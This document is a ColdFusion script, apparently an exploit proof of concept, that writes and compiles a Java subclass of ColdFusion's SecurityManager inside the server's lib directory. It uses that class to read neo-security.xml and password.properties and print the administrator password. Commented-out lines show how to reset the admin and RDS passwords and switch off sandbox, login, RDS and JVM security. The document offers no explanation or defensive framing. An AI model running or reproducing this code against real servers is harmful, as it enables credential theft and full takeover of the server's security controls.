objFileWriter = CreateObject("java","java.io.FileWriter"); objByteArray = CreateObject("java","java.io.ByteArrayOutputStream"); objJavaC = CreateObject("java","sun.tools.javac.Main"); objString = CreateObject("java","java.lang.String"); objFile = CreateObject("java","java.io.File"); if (Server.Os.Name IS "Windows") { s = "\"; } else { s = "/"; } strJavaSource = "#Server.ColdFusion.Rootdir##s#lib#s#SecurityExploit.java"; strCfusionJar = "#Server.ColdFusion.Rootdir##s#lib#s#cfusion.jar"; strNeoSecFile = "#Server.ColdFusion.Rootdir##s#lib#s#neo-security.xml"; strPasswdFile = "#Server.ColdFusion.Rootdir##s#lib#s#password.properties"; fileWriter = objFileWriter.init("#strJavaSource#",false); fileWriter.write("import coldfusion.security.SecurityManager;"); fileWriter.write("import java.io.File;"); fileWriter.write("public class SecurityExploit extends SecurityManager {"); fileWriter.write("public SecurityExploit(File arg0, File arg1) {"); fileWriter.write("super(arg0, arg1); }"); fileWriter.write("public boolean isAdminSecurityEnabled(){"); fileWriter.write("return false;}}"); fileWriter.flush(); fileWriter.close(); str = objString.init("-classpath,#strCfusionJar#,#strJavaSource#"); strArr = str.split(","); byteArray = objByteArray.init(); compileObj =objJavaC.init(byteArray,str); compileObj.compile(strArr); obj = CreateObject("java","SecurityExploit"); file1 = objFile.init("#strNeoSecFile#"); file2 = objFile.init("#strPasswdFile#"); obj.init(file1,file2); obj.load(); // Get Administrator Password strAdminPw = obj.getAdminPassword(); // Set Administrator Password //obj.setAdminPassword("test123"); // Turn off Sandbox Security //obj.setSandboxSecurityEnabled(false); // Turn off Administrator Login //obj.setAdminSecurityEnabled(false); // Turn off RDS Login //obj.setRdsSecurityEnabled(false); // Set RDS Password //obj.setRdsPassword("test123"); // Turn off JVM Security //obj.setJvmSecurityEnabled(false); Adminstrator Password: #strAdminPw#